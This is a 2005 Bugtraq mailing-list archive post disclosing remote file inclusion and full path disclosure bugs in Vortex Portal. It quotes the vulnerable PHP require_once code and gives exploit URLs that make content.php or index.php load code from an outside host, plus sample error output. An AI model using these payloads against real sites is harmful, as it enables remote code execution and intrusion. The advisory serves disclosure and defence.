Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




bugtraq logo Bugtraq mailing list archives

Vortex Portal
From: Francisco Alisson <dominusvis () click21 com br>
Date: 23 Mar 2005 12:23:43 -0000



Vortex Portal Multiples Bugs

Vendor: http://www.VortexPortal.net
Contact: Brian Price                                                     Email: VGChatter () shaw ca

I. Remote File Inclusion:

content.php -->

...
if (!isset($act)) {
        require_once("main.php");
} else {
        require_once("$act.php");
...
?>

index.php -->
...
require_once($root_dir."/content.php");
...

Exploits
 http://[target-host]/index.php?act=http://[host]/file
 http://[target-host]/content.php?act=http://[host]/file

II. Full Path Disclosure
 http://[target-host]/content.php?act=something-wrong
 and we've get :

 Warning: main(something-wrond.php): failed to open stream: No such file or directory in /home/*/content.php on line 9

 Fatal error: main(): Failed opening required 'something-wrond.php' 
(include_path='.:/usr/local/lib/php:/usr/lib/php:../:../') in /home/*/content.php on line 9

Ps.: the vendor wasn't informed.

[ Infektion Group ]
 by Dominus_Vis


  By Date           By Thread  

Current thread:
  • Vortex Portal Francisco Alisson (Mar 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]